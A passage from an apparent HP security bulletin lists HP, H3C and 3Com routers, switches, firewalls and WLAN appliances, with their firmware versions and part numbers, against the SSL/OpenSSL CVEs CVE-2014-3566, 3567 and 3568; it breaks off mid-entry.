6602 Russian Version R3303P18 JC176A HP 6602 Router Chassis H3C SR6602 1U Router Host (0235A27D)

CVE-2014-3566 CVE-2014-3568

A6600 R3303P18 JC165A HP 6600 RPE-X1 Router Module JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JC566A HP A6600 RSE-X1 Main Processing Unit JG780A HP 6600 RSE-X1 Router TAA MPU H3C RT-SR66-RPE-X1-H3 (0231A761) H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)

CVE-2014-3566 CVE-2014-3568

A6600 Russian Version R3303P18 JC165A HP 6600 RPE-X1 Router Module JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JC566A HP A6600 RSE-X1 Main Processing Unit JG780A HP 6600 RSE-X1 Router TAA MPU H3C RT-SR66-RPE-X1-H3 (0231A761) H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)

CVE-2014-3566 CVE-2014-3568

6600 MCP R3303P18 JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JG778A HP 6600 MCP-X2 Router TAA MPU. JG355A HP 6600 MCP-X1 Router MPU JG356A HP 6600 MCP-X2 Router MPU H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)

CVE-2014-3566 CVE-2014-3568

6600 MCP Russian Version R3303P18 JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JG355A HP 6600 MCP-X1 Router MPU JG356A HP 6600 MCP-X2 Router MPU JG776A HP HSR6602-G TAA Router JG777A HP HSR6602-XG TAA Router JG778A HP 6600 MCP-X2 Router TAA MPU

H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)

CVE-2014-3566 CVE-2014-3568

5920 Switch Series R2311P05 JG296A HP 5920AF-24XG Switch JG555A HP 5920AF-24XG TAA Switch

CVE-2014-3566 CVE-2014-3567 CVE-2014-3568

5900 Switch Series R2311P05 JC772A HP 5900AF-48XG-4QSFP+ Switch JG336A HP 5900AF-48XGT-4QSFP+ Switch JG510A HP 5900AF-48G-4XG-2QSFP+ Switch JG554A HP 5900AF-48XG-4QSFP+ TAA Switch JG838A HP FF 5900CP-48XG-4QSFP+ Switch

CVE-2014-3566 CVE-2014-3567 CVE-2014-3568

5830 Switch Series R1118P11 JC691A HP A5830AF-48G Switch w/1 Interface Slot JC694A HP A5830AF-96G Switch JG316A HP 5830AF-48G TAA Switch w/1 Intf Slot JG374A HP 5830AF-96G TAA Switch

CVE-2014-3566 CVE-2014-3568

5820 Switch Series R1809P03 JC102A HP 5820-24XG-SFP+ Switch JC106A HP 5820-14XG-SFP+ Switch with 2 Slots JG219A HP 5820AF-24XG Switch JG243A HP 5820-24XG-SFP+ TAA-compliant Switch JG259A HP 5820X-14XG-SFP+ TAA Switch w 2 Slots H3C S5820X-28C 14 port (SFP Plus ) Plus 4-port BT (RJ45) Plus 2 media modules Plus OSM (0235A37L) H3C S5820X-28S 24-port 10GBASE-X (SFP Plus ) Plus 4-port 10/100/1000BASE-T (RJ45) (0235A370)

CVE-2014-3566 CVE-2014-3568

5800 Switch Series R1809P03 JC099A HP 5800-24G-PoE Switch JC100A HP 5800-24G Switch JC101A HP 5800-48G Switch with 2 Slots JC103A HP 5800-24G-SFP Switch JC104A HP 5800-48G-PoE Switch JC105A HP 5800-48G Switch JG225A HP 5800AF-48G Switch JG242A HP 5800-48G-PoE+ TAA Switch w 2 Slots JG254A HP 5800-24G-PoE+ TAA-compliant Switch JG255A HP 5800-24G TAA-compliant Switch JG256A HP 5800-24G-SFP TAA Switch w 1 Intf Slt JG257A HP 5800-48G-PoE+ TAA Switch with 1 Slot JG258A HP 5800-48G TAA Switch w 1 Intf Slot H3C S5800-32C - 24-port 1BT Plus 4-port (SFP Plus ) Plus 1 media slot (0235A36U) H3C S5800-32C-PWR - 24-port 10/100/1000BASE-T (RJ45) Plus 4-port 10GBASE-X (SFP Plus ) Plus 1 media module PoE (0235A36S) H3C S5800-32F 24-port 1000BASE-X (SFP) Plus 4-port 10GBASE-X (SFP Plus ) Plus media module (no power) (0235A374) H3C S5800-56C 48-port 10/100/1000BASE-T (RJ45) Plus 4port 10GBASE-X (SFP Plus ) Plus media module (0235A379) H3C S5800-56C-PWR 48-port BT Plus 4 port (SFP Plus ) Plus media module (0235A378) H3C S5800-60C-PWR 48-port BT Plus 4-port SFP Plus 2 media modules Plus OSM (0235A36W)

CVE-2014-3566 CVE-2014-3568

5700 R2311P05 JG894A HP FF 5700-48G-4XG-2QSFP+ Switch JG895A HP FF 5700-48G-4XG-2QSFP+ TAA Switch JG896A HP FF 5700-40XG-2QSFP+ Switch JG897A HP FF 5700-40XG-2QSFP+ TAA Switch JG898A HP FF 5700-32XGT-8XG-2QSFP+ Switch JG899A HP FF 5700-32XGT-8XG-2QSFP+ TAA Switch

CVE-2014-3566 CVE-2014-3567 CVE-2014-3568

5500 HI Switch Series R5501P06 JG311A HP HI 5500-24G-4SFP w/2 Intf Slts Switch JG312A HP HI 5500-48G-4SFP w/2 Intf Slts Switch JG541A HP 5500-24G-PoE+-4SFP HI Switch w/2 Slt JG542A HP 5500-48G-PoE+-4SFP HI Switch w/2 Slt JG543A HP 5500-24G-SFP HI Switch w/2 Intf Slt JG679A HP 5500-24G-PoE+-4SFP HI TAA Swch w/2Slt JG680A HP 5500-48G-PoE+-4SFP HI TAA Swch w/2Slt JG681A HP 5500-24G-SFP HI TAA Swch w/2Slt

CVE-2014-3566 CVE-2014-3568

5500 EI Switch Series R2221P08 JD373A HP 5500-24G DC EI Switch JD374A HP 5500-24G-SFP EI Switch JD375A HP 5500-48G EI Switch JD376A HP 5500-48G-PoE EI Switch JD377A HP 5500-24G EI Switch JD378A HP 5500-24G-PoE EI Switch JD379A HP 5500-24G-SFP DC EI Switch JG240A HP 5500-48G-PoE+ EI Switch w/2 Intf Slts JG241A HP 5500-24G-PoE+ EI Switch w/2 Intf Slts JG249A HP 5500-24G-SFP EI TAA Switch w 2 Slts JG250A HP 5500-24G EI TAA Switch w 2 Intf Slts JG251A HP 5500-48G EI TAA Switch w 2 Intf Slts JG252A HP 5500-24G-PoE+ EI TAA Switch w/2 Slts JG253A HP 5500-48G-PoE+ EI TAA Switch w/2 Slts H3C S5500-28C-EI Ethernet Switch (0235A253) H3C S5500-28F-EI Eth Switch AC Single (0235A24U) H3C S5500-52C-EI Ethernet Switch (0235A24X) H3C S5500-28C-EI-DC Ethernet Switch (0235A24S) H3C S5500-28C-PWR-EI Ethernet Switch (0235A255) H3C S5500-28F-EI Eth Swtch DC Single Pwr (0235A259) H3C S5500-52C-PWR-EI Ethernet Switch (0235A251)

CVE-2014-3566 CVE-2014-3568

5500 SI Switch Series R2221P08 JD369A HP 5500-24G SI Switch JD370A HP 5500-48G SI Switch JD371A HP 5500-24G-PoE SI Switch JD372A HP 5500-48G-PoE SI Switch JG238A HP 5500-24G-PoE+ SI Switch w/2 Intf Slts JG239A HP 5500-48G-PoE+ SI Switch w/2 Intf Slts H3C S5500-28C-SI Ethernet Switch (0235A04U) H3C S5500-52C-SI Ethernet Switch (0235A04V) H3C S5500-28C-PWR-SI Ethernet Switch (0235A05H) H3C S5500-52C-PWR-SI Ethernet Switch (0235A05J)

CVE-2014-3566 CVE-2014-3568

5130 EI switch Series R3108P03 JG932A HP 5130-24G-4SFP+ EI Switch JG933A HP 5130-24G-SFP-4SFP+ EI Switch JG934A HP 5130-48G-4SFP+ EI Switch JG936A HP 5130-24G-PoE+-4SFP+ EI Swch JG937A HP 5130-48G-PoE+-4SFP+ EI Swch JG975A HP 5130-24G-4SFP+ EI BR Switch JG976A HP 5130-48G-4SFP+ EI BR Switch JG977A HP 5130-24G-PoE+-4SFP+ EI BR Swch JG978A HP 5130-48G-PoE+-4SFP+ EI BR Swch

CVE-2014-3566 CVE-2014-3567 CVE-2014-3568

5120 EI Switch Series R2221P08 JE066A HP 5120-24G EI Switch JE067A HP 5120-48G EI Switch JE068A HP 5120-24G EI Switch with 2 Slots JE069A HP 5120-48G EI Switch with 2 Slots JE070A HP 5120-24G-PoE EI Switch with 2 Slots JE071A HP 5120-48G-PoE EI Switch with 2 Slots JG236A HP 5120-24G-PoE+ EI Switch w/2 Intf Slts JG237A HP 5120-48G-PoE+ EI Switch w/2 Intf Slts JG245A HP 5120-24G EI TAA Switch w 2 Intf Slts JG246A HP 5120-48G EI TAA Switch w 2 Intf Slts JG247A HP 5120-24G-PoE+ EI TAA Switch w 2 Slts JG248A HP 5120-48G-PoE+ EI TAA Switch w 2 Slts H3C S5120-24P-EI 24GE Plus 4ComboSFP (0235A0BQ) H3C S5120-28C-EI 24GE Plus 4Combo Plus 2Slt (0235A0BS) H3C S5120-48P-EI 48GE Plus 4ComboSFP (0235A0BR) H3C S5120-52C-EI 48GE Plus 4Combo Plus 2Slt (0235A0BT) H3C S5120-28C-PWR-EI 24G Plus 4C Plus 2S Plus POE (0235A0BU) H3C S5120-52C-PWR-EI 48G Plus 4C Plus 2S Plus POE (0235A0BV)

CVE-2014-3566 CVE-2014-3568

5120 SI switch Series R1513P95 JE072A HP 5120-48G SI Switch JE073A HP 5120-16G SI Switch JE074A HP 5120-24G SI Switch JG091A HP 5120-24G-PoE+ (370W) SI Switch JG092A HP 5120-24G-PoE+ (170W) SI Switch H3C S5120-52P-SI 48GE Plus 4 SFP (0235A41W) H3C S5120-20P-SI L2 16GE Plus 4SFP (0235A42B) H3C S5120-28P-SI 24GE Plus 4 SFP (0235A42D) H3C S5120-28P-HPWR-SI (0235A0E5) H3C S5120-28P-PWR-SI (0235A0E3)

CVE-2014-3566 CVE-2014-3568

4800 G Switch Series R2221P08 JD007A HP 4800-24G Switch JD008A HP 4800-24G-PoE Switch JD009A HP 4800-24G-SFP Switch JD010A HP 4800-48G Switch JD011A HP 4800-48G-PoE Switch

3Com Switch 4800G 24-Port (3CRS48G-24-91) 3Com Switch 4800G 24-Port SFP (3CRS48G-24S-91) 3Com Switch 4800G 48-Port (3CRS48G-48-91) 3Com Switch 4800G PWR 24-Port (3CRS48G-24P-91) 3Com Switch 4800G PWR 48-Port (3CRS48G-48P-91) CVE-2014-3566 CVE-2014-3568

4510G Switch Series R2221P08 JF428A HP 4510-48G Switch JF847A HP 4510-24G Switch

3Com Switch 4510G 48 Port (3CRS45G-48-91) 3Com Switch 4510G PWR 24-Port (3CRS45G-24P-91) 3Com Switch E4510-24G (3CRS45G-24-91) CVE-2014-3566 CVE-2014-3568

4210G Switch Series R2221P08 JF844A HP 4210-24G Switch JF845A HP 4210-48G Switch JF846A HP 4210-24G-PoE Switch

3Com Switch 4210-24G (3CRS42G-24-91) 3Com Switch 4210-48G (3CRS42G-48-91) 3Com Switch E4210-24G-PoE (3CRS42G-24P-91) CVE-2014-3566 CVE-2014-3568

3610 Switch Series R5319P10 JD335A HP 3610-48 Switch JD336A HP 3610-24-4G-SFP Switch JD337A HP 3610-24-2G-2G-SFP Switch JD338A HP 3610-24-SFP Switch H3C S3610-52P - model LS-3610-52P-OVS (0235A22C) H3C S3610-28P - model LS-3610-28P-OVS (0235A22D) H3C S3610-28TP - model LS-3610-28TP-OVS (0235A22E) H3C S3610-28F - model LS-3610-28F-OVS (0235A22F)

CVE-2014-3566 CVE-2014-3568

3600 V2 Switch Series R2110P03 JG299A HP 3600-24 v2 EI Switch JG300A HP 3600-48 v2 EI Switch JG301A HP 3600-24-PoE+ v2 EI Switch JG301B HP 3600-24-PoE+ v2 EI Switch JG302A HP 3600-48-PoE+ v2 EI Switch JG302B HP 3600-48-PoE+ v2 EI Switch JG303A HP 3600-24-SFP v2 EI Switch JG304A HP 3600-24 v2 SI Switch JG305A HP 3600-48 v2 SI Switch JG306A HP 3600-24-PoE+ v2 SI Switch JG306B HP 3600-24-PoE+ v2 SI Switch JG307A HP 3600-48-PoE+ v2 SI Switch JG307B HP 3600-48-PoE+ v2 SI Switch

CVE-2014-3566 CVE-2014-3568

3100V2 R5203P11 JD313B HP 3100-24-PoE v2 EI Switch JD318B HP 3100-8 v2 EI Switch JD319B HP 3100-16 v2 EI Switch JD320B HP 3100-24 v2 EI Switch JG221A HP 3100-8 v2 SI Switch JG222A HP 3100-16 v2 SI Switch JG223A HP 3100-24 v2 SI Switch

CVE-2014-3566 CVE-2014-3568

3100V2-48 R2110P03 JG315A HP 3100-48 v2 Switch

CVE-2014-3566 CVE-2014-3568

1920 R1105 JG920A HP 1920-8G Switch JG921A HP 1920-8G-PoE+ (65W) Switch JG922A HP 1920-8G-PoE+ (180W) Switch JG923A HP 1920-16G Switch JG924A HP 1920-24G Switch JG925A HP 1920-24G-PoE+ (180W) Switch JG926A HP 1920-24G-PoE+ (370W) Switch JG927A HP 1920-48G Switch

CVE-2014-3566 CVE-2014-3568

1910 R11XX R1107 JG536A HP 1910-8 Switch JG537A HP 1910-8 -PoE+ Switch JG538A HP 1910-24 Switch JG539A HP 1910-24-PoE+ Switch JG540A HP 1910-48 Switch

CVE-2014-3566 CVE-2014-3568

1910 R15XX R1513P95 JE005A HP 1910-16G Switch JE006A HP 1910-24G Switch JE007A HP 1910-24G-PoE (365W) Switch JE008A HP 1910-24G-PoE(170W) Switch JE009A HP 1910-48G Switch JG348A HP 1910-8G Switch JG349A HP 1910-8G-PoE+ (65W) Switch JG350A HP 1910-8G-PoE+ (180W) Switch

CVE-2014-3566 CVE-2014-3568

1620 R1104 JG912A HP 1620-8G Switch JG913A HP 1620-24G Switch JG914A HP 1620-48G Switch

CVE-2014-3566 CVE-2014-3568

MSR20-1X R2513P33 JD431A HP MSR20-10 Router JD667A HP MSR20-15 IW Multi-Service Router JD668A HP MSR20-13 Multi-Service Router JD669A HP MSR20-13 W Multi-Service Router JD670A HP MSR20-15 A Multi-Service Router JD671A HP MSR20-15 AW Multi-Service Router JD672A HP MSR20-15 I Multi-Service Router JD673A HP MSR20-11 Multi-Service Router JD674A HP MSR20-12 Multi-Service Router JD675A HP MSR20-12 W Multi-Service Router JD676A HP MSR20-12 T1 Multi-Service Router JF236A HP MSR20-15-I Router JF237A HP MSR20-15-A Router JF238A HP MSR20-15-I-W Router JF239A HP MSR20-11 Router JF240A HP MSR20-13 Router JF241A HP MSR20-12 Router JF806A HP MSR20-12-T Router JF807A HP MSR20-12-W Router JF808A HP MSR20-13-W Router JF809A HP MSR20-15-A-W Router JF817A HP MSR20-15 Router JG209A HP MSR20-12-T-W Router (NA) JG210A HP MSR20-13-W Router (NA) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8) H3C MSR 20-10 (0235A0A7) H3C RT-MSR2011-AC-OVS-H3 (0235A395) H3C RT-MSR2012-AC-OVS-H3 (0235A396) H3C RT-MSR2012-AC-OVS-W-H3 (0235A397) H3C RT-MSR2012-T-AC-OVS-H3 (0235A398) H3C RT-MSR2013-AC-OVS-H3 (0235A390) H3C RT-MSR2013-AC-OVS-W-H3 (0235A391) H3C RT-MSR2015-AC-OVS-A-H3 (0235A392) H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393) H3C RT-MSR2015-AC-OVS-I-H3 (0235A394) H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V) H3C MSR 20-11 (0235A31V) H3C MSR 20-12 (0235A32E) H3C MSR 20-12 T1 (0235A32B) H3C MSR 20-13 (0235A31W) H3C MSR 20-13 W (0235A31X) H3C MSR 20-15 A (0235A31Q) H3C MSR 20-15 A W (0235A31R) H3C MSR 20-15 I (0235A31N) H3C MSR 20-15 IW (0235A31P) H3C MSR20-12 W (0235A32G)

CVE-2014-3566 CVE-2014-3568

MSR30 R2513P33 JD654A HP MSR30-60 POE Multi-Service Router JD657A HP MSR30-40 Multi-Service Router JD658A HP MSR30-60 Multi-Service Router JD660A HP MSR30-20 POE Multi-Service Router JD661A HP MSR30-40 POE Multi-Service Router JD666A HP MSR30-20 Multi-Service Router JF229A HP MSR30-40 Router JF230A HP MSR30-60 Router JF232A HP RT-MSR3040-AC-OVS-AS-H3 JF235A HP MSR30-20 DC Router JF284A HP MSR30-20 Router JF287A HP MSR30-40 DC Router JF801A HP MSR30-60 DC Router JF802A HP MSR30-20 PoE Router JF803A HP MSR30-40 PoE Router JF804A HP MSR30-60 PoE Router H3C MSR 30-20 Router (0235A328) H3C MSR 30-40 Router Host(DC) (0235A268) H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322) H3C RT-MSR3020-DC-OVS-H3 (0235A267) H3C RT-MSR3040-AC-OVS-H (0235A299) H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323) H3C RT-MSR3060-AC-OVS-H3 (0235A320) H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296) H3C RT-MSR3060-DC-OVS-H3 (0235A269) H3C MSR 30-20 RTVZ33020AS Router Host(AC) (0235A20S) H3C MSR 30-20 (0235A19L) H3C MSR 30-20 POE (0235A239) H3C MSR 30-40 (0235A20J) H3C MSR 30-40 POE (0235A25R) H3C MSR 30-60 (0235A20K) H3C MSR 30-60 POE (0235A25S) H3C RT-MSR3040-AC-OVS-AS-H3 (0235A20V)

CVE-2014-3566 CVE-2014-3568

MSR30-16 R2513P33 JD659A HP MSR30-16 POE Multi-Service Router JD665A HP MSR30-16 Multi-Service Router JF233A HP MSR30-16 Router JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327) H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321) H3C MSR 30-16 (0235A237) H3C MSR 30-16 POE (0235A238)

CVE-2014-3566 CVE-2014-3568

MSR30-1X R2513P33 JF800A HP MSR30-11 Router JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr JG182A HP MSR30-11E Router JG183A HP MSR30-11F Router JG184A HP MSR30-10 DC Router H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H) H3C RT-MSR3011-AC-OVS-H3 (0235A29L)

CVE-2014-3566 CVE-2014-3568

MSR50 R2513P33 JD433A HP MSR50-40 Router JD653A HP MSR50 Processor Module JD655A HP MSR50-40 Multi-Service Router JD656A HP MSR50-60 Multi-Service Router JF231A HP MSR50-60 Router JF285A HP MSR50-40 DC Router JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297) H3C MSR5040-DC-OVS-H3C (0235A20P) H3C RT-MSR5060-AC-OVS-H3 (0235A298) H3C MSR 50-40 Chassis (0235A20N) H3C MSR 50-60 Chassis (0235A20L)

CVE-2014-3566 CVE-2014-3568

MSR50-G2 R2513P33 JD429A HP MSR50 G2 Processor Module JD429B HP MSR50 G2 Processor Module H3C H3C MSR 50 Processor Module-G2 (0231A84Q) H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD(0231A0KL)

CVE-2014-3566 CVE-2014-3568

MSR20 Russian version MSR201X_5.20.R2513L40.RU JD663B HP MSR20-21 Router JF228A HP MSR20-40 Router JF283A HP MSR20-20 Router H3C RT-MSR2020-AC-OVS-H3C (0235A324) H3C RT-MSR2040-AC-OVS-H3 (0235A326)

CVE-2014-3566 CVE-2014-3568

MSR20-1X Russian version MSR201X_5.20.R2513L40.RU JD431A HP MSR20-10 Router JF236A HP MSR20-15-I Router JF237A HP MSR20-15-A Router JF238A HP MSR20-15-I-W Router JF239A HP MSR20-11 Router JF240A HP MSR20-13 Router JF241A HP MSR20-12 Router JF806A HP MSR20-12-T Router JF807A HP MSR20-12-W Router JF808A HP MSR20-13-W Router JF809A HP MSR20-15-A-W Router JF817A HP MSR20-15 Router H3C MSR 20-10 (0235A0A7) H3C RT-MSR2015-AC-OVS-I-H3 (0235A394) H3C RT-MSR2015-AC-OVS-A-H3 (0235A392) H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393) H3C RT-MSR2011-AC-OVS-H3 (0235A395) H3C RT-MSR2013-AC-OVS-H3 (0235A390) H3C RT-MSR2012-AC-OVS-H3 (0235A396) H3C RT-MSR2012-T-AC-OVS-H3 (0235A398) H3C RT-MSR2012-AC-OVS-W-H3 (0235A397) H3C RT-MSR2013-AC-OVS-W-H3 (0235A391) H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)

CVE-2014-3566 CVE-2014-3568

MSR30 Russian version MSR201X_5.20.R2513L40.RU JF229A HP MSR30-40 Router JF230A HP MSR30-60 Router JF235A HP MSR30-20 DC Router JF284A HP MSR30-20 Router JF287A HP MSR30-40 DC Router JF801A HP MSR30-60 DC Router JF802A HP MSR30-20 PoE Router JF803A HP MSR30-40 PoE Router JF804A HP MSR30-60 PoE Router H3C RT-MSR3040-AC-OVS-H (0235A299) H3C RT-MSR3060-AC-OVS-H3 (0235A320) H3C RT-MSR3020-DC-OVS-H3 (0235A267) H3C MSR 30-20 Router (0235A328) H3C MSR 30-40 Router Host(DC) (0235A268) H3C RT-MSR3060-DC-OVS-H3 (0235A269) H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322) H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323) H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)

CVE-2014-3566 CVE-2014-3568

MSR30-16 Russian version MSR201X_5.20.R2513L40.RU JF233A HP MSR30-16 Router JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327) H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)

CVE-2014-3566 CVE-2014-3568

MSR30-1X Russian version MSR201X_5.20.R2513L40.RU JF800A HP MSR30-11 Router JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr JG182A HP MSR30-11E Router JG183A HP MSR30-11F Router JG184A HP MSR30-10 DC Router H3C RT-MSR3011-AC-OVS-H3 (0235A29L) H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)

CVE-2014-3566 CVE-2014-3568

MSR50 Russian version MSR201X_5.20.R2513L40.RU JD433A HP MSR50-40 Router JD653A HP MSR50 Processor Module JD655A HP MSR50-40 Multi-Service Router JD656A HP MSR50-60 Multi-Service Router JF231A HP MSR50-60 Router JF285A HP MSR50-40 DC Router JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297) H3C MSR 50 Processor Module (0231A791) H3C MSR 50-40 Chassis (0235A20N) H3C MSR 50-60 Chassis (0235A20L) H3C RT-MSR5060-AC-OVS-H3 (0235A298) H3C MSR5040-DC-OVS-H3C (0235A20P)

CVE-2014-3566 CVE-2014-3568

MSR50 G2 Russian version MSR201X_5.20.R2513L40.RU JD429B HP MSR50 G2 Processor Module H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD (0231A0KL)

CVE-2014-3566 CVE-2014-3568

MSR9XX R2513P33 JF812A HP MSR900 Router JF813A HP MSR920 Router JF814A HP MSR900-W Router JF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr JG207A HP MSR900-W Router (NA) JG208A HP MSR920-W Router (NA) H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b (0235A0C2) H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX) H3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4) H3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0)

CVE-2014-3566 CVE-2014-3568

MSR93X R2513P33 JG512A HP MSR930 Wireless Router JG513A HP MSR930 3G Router JG514A HP MSR931 Router JG515A HP MSR931 3G Router JG516A HP MSR933 Router JG517A HP MSR933 3G Router JG518A HP MSR935 Router JG519A HP MSR935 Wireless Router JG520A HP MSR935 3G Router JG531A HP MSR931 Dual 3G Router JG596A HP MSR930 4G LTE/3G CDMA Router JG597A HP MSR936 Wireless Router JG665A HP MSR930 4G LTE/3G WCDMA Global Router JG704A HP MSR930 4G LTE/3G WCDMA ATT Router

CVE-2014-3566 CVE-2014-3568

MSR1000 R2513P33 JG732A HP MSR1003-8 AC Router

CVE-2014-3566 CVE-2014-3568

MSR1000 Russian version R2513L40.RU JG732A HP MSR1003-8 AC Router

CVE-2014-3566 CVE-2014-3568

MSR2000 R0106P18 JG411A HP MSR2003 AC Router

CVE-2014-3566 CVE-2014-3567 CVE-2014-3568

MSR3000 R0106P18 JG404A HP MSR3064 Router JG405A HP MSR3044 Router JG406A HP MSR3024 AC Router JG409A HP MSR3012 AC Router JG861A HP MSR3024 TAA-compliant AC Router

CVE-2014-3566 CVE-2014-3567 CVE-2014-3568

MSR4000 R0106P18 JG402A HP MSR4080 Router Chassis JG403A HP MSR4060 Router Chassis JG412A HP MSR4000 MPU-100 Main Processing Unit

CVE-2014-3566 CVE-2014-3567 CVE-2014-3568

F5000 F3210P22 JG216A HP F5000 Firewall Standalone Chassis JD259A HP A5000-A5 VPN Firewall Chassis H3C SecPath F5000-A5 Host System (0150A0AG)

CVE-2014-3566 CVE-2014-3568

F5000-C R3811P03 JG650A HP F5000-C VPN Firewall Appliance

CVE-2014-3566 CVE-2014-3568

F5000-S R3811P03 JG370A HP F5000-S VPN Firewall Appliance

CVE-2014-3566 CVE-2014-3568

U200S and CS F5123P30 JD268A HP 200-CS UTM Appliance JD273A HP U200-S UTM Appliance H3C SecPath U200-S (0235A36N)

CVE-2014-3566 CVE-2014-3568

U200A and M F5123P30 JD274A HP 200-M UTM Appliance JD275A HP U200-A UTM Appliance H3C SecPath U200-A (0235A36Q)

CVE-2014-3566 CVE-2014-3568

SecBlade III R3820P03 JG371A HP 12500 20Gbps VPN Firewall Module JG372A HP 10500/11900/7500 20Gbps VPN FW Mod

CVE-2014-3566 CVE-2014-3568

SecBlade FW R3181P05 JC635A HP 12500 VPN Firewall Module JD245A HP 9500 VPN Firewall Module JD249A HP 10500/7500 Advanced VPN Firewall Mod JD250A HP 6600 Firewall Processing Rtr Module JD251A HP 8800 Firewall Processing Module JD255A HP 5820 VPN Firewall Module H3C S9500E SecBlade VPN Firewall Module (0231A0AV) H3C S7500E SecBlade VPN Firewall Module (0231A832) H3C SR66 Gigabit Firewall Module (0231A88A) H3C SR88 Firewall Processing Module (0231A88L) H3C S5820 SecBlade VPN Firewall Module (0231A94J)

CVE-2014-3566 CVE-2014-3568

F1000-E R3181P05 JD272A HP F1000-E VPN Firewall Appliance

CVE-2014-3566 CVE-2014-3568

F1000-A R3734P06 JG214A HP F1000-A-EI VPN Firewall Appliance

CVE-2014-3566 CVE-2014-3568

F1000-S R3734P06 JG213A HP F1000-S-EI VPN Firewall Appliance

CVE-2014-3566 CVE-2014-3568

SecBlade SSL VPN Fix in Progress Use Mitigation JD253A HP 10500/7500 SSL VPN Mod w 500-user Lic

CVE-2014-3566 CVE-2014-3568

VSR1000 R0204P01 JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software JG811AAE HP VSR1001 Comware 7 Virtual Services Router JG812AAE HP VSR1004 Comware 7 Virtual Services Router JG813AAE HP VSR1008 Comware 7 Virtual Services Router

CVE-2014-3566 CVE-2014-3567 CVE-2014-3568

WX5002/5004 R2507P34 JD441A HP 5800 ACM for 64-256 APs JD447B HP WX5002 Access Controller JD448A HP A-WX5004 Access Controller JD448B HP WX5004 Access Controller JD469A HP A-WX5004 (3Com) Access Controller JG261A HP 5800 Access Controller OAA TAA Mod

CVE-2014-3566 CVE-2014-3568

HP 850/870 R2607P34 JG723A HP 870 Unified Wired-WLAN Appliance JG725A HP 870 Unifd Wrd-WLAN TAA Applnc JG722A HP 850 Unified Wired-WLAN Appliance JG724A HP 850 Unifd Wrd-WLAN TAA Applnc

CVE-2014-3566 CVE-2014-3568

HP 830 R3507P34 JG640A HP 830 24P PoE+ Unifd Wired-WLAN Swch JG641A HP 830 8P PoE+ Unifd Wired-WLAN Swch JG646A HP 830 24-Port PoE+ Wrd-WLAN TAA Switch JG647A HP 830 8-Port PoE+ Wrd-WLAN TAA Switch

CVE-2014-3566 CVE-2014-3568

HP 6000 R2507P34 JG639A HP 10500/7500 20G Unified Wired-WLAN Mod JG645A HP 10500/7500 20G Unifd Wrd-WLAN TAA Mod

CVE-2014-3566 CVE-2014-3568

VCX Fix in Progress Use Mitigation J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr JC517A HP VCX V7205 Platform w/DL 360 G6 Server JE355A HP VCX V6000 Branch Platform 9.0 JC516A HP VCX V7005 Platform w/DL 120 G6 Server JC518A HP VCX Connect 200 Primry 120 G6 Server J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr JE341A HP VCX Connect 100 Secondary JE252A HP VCX Connect Primary MIM Module JE253A HP VCX Connect Secondary MIM Module JE254A HP VCX Branch MIM Module JE355A HP VCX V6000 Branch Platform 9.0 JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod JD023A HP MSR30-40 Router with VCX MIM Module JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod JD027A HP MSR30-16 RTR 